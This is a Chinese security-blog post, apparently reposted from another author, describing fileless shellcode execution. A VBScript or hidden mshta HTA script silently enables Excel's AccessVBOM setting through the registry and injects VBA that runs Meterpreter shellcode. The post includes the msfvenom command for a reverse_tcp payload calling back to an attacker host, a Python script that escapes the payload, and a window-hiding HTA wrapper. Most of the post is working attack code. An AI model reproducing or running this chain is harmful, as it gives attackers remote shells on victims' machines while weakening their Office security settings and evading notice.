VBS 无文件执行 ShellCode

admin
admin
admin
102360
文章
87
评论
2023年12月16日08:37:14评论14 views字数 2177阅读7分15秒阅读模式

既然 VBA 能够调用 Win API, 那 VBS 又何尝不可呢?

参考文章

VBS 并不能直接调用 Win API, 但是能够间接的执行 VBA 代码, 主要是通过创建 Excel 对象的方式来插入 VBA, 运行时会多出来一个 Excel.exe 的进程, 缺点是只有安装 Microsoft Office 后才能正常调用, WPS 都不行.

Dim WshShell
Dim oExcel
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
Set oExcel = CreateObject("excel.application")
Set oBook = oExcel.Workbooks.Add
Set oModule = oBook.VBProject.VBComponents.Add(1)
strCode = "VBA Code"
oModule.CodeModule.AddFromString strCode
oExcel.Run "Auto_Open"
oExcel.DisplayAlerts = False

利用这点, 通过 VBA 操纵 Win API 来执行 ShellCode.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f vba -o vba.txt

转义字符.

with open('text.txt','r') as f:
	text = f.readlines()

newtext = ''

for line in text:
	newline = line.replace('"', '""')
	newline = '"' + newline
	newline = newline.replace('\n', '" & vbCr & _ \n')
	newtext += newline

newtext += '"'

with open('payload.txt', 'w+') as f:
	f.write(newtext)

粘贴进 strCode 中, 然后执行脚本.

http://cn-sec.com/wp-content/uploads/2023/12/20231215115329-54.png

hta sct 都可以调用 VBS, 这里以 mshta 为例.

<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Dim WshShell
Dim oExcel
set WshShell = CreateObject("Wscript.Shell")
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
WshShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\AccessVBOM",1,"REG_DWORD"
Set oExcel = CreateObject("excel.application")
Set oBook = oExcel.Workbooks.Add
Set oModule = oBook.VBProject.VBComponents.Add(1)
strCode = THE_POSITION_YOU_SHOULD_PASTE_TO
oModule.CodeModule.AddFromString strCode
oExcel.Run "Auto_Open"
Self.Close
</script>
<body>
</body>
</HEAD> 
</HTML>

通过 mshta 执行, 反弹会话的时候会慢十几秒钟.

http://cn-sec.com/wp-content/uploads/2023/12/20231215115329-88.png

http://cn-sec.com/wp-content/uploads/2023/12/20231215115330-83.png

另外还有些兼容性的问题, 在 Windows 10, Office 2019 下需要开启 “信任对 VBA 工程对象模型的访问”, 但会话还是会直接退出.

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月16日08:37:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VBS 无文件执行 ShellCodehttps://cn-sec.com/archives/2306560.html

发表评论

匿名网友 填写信息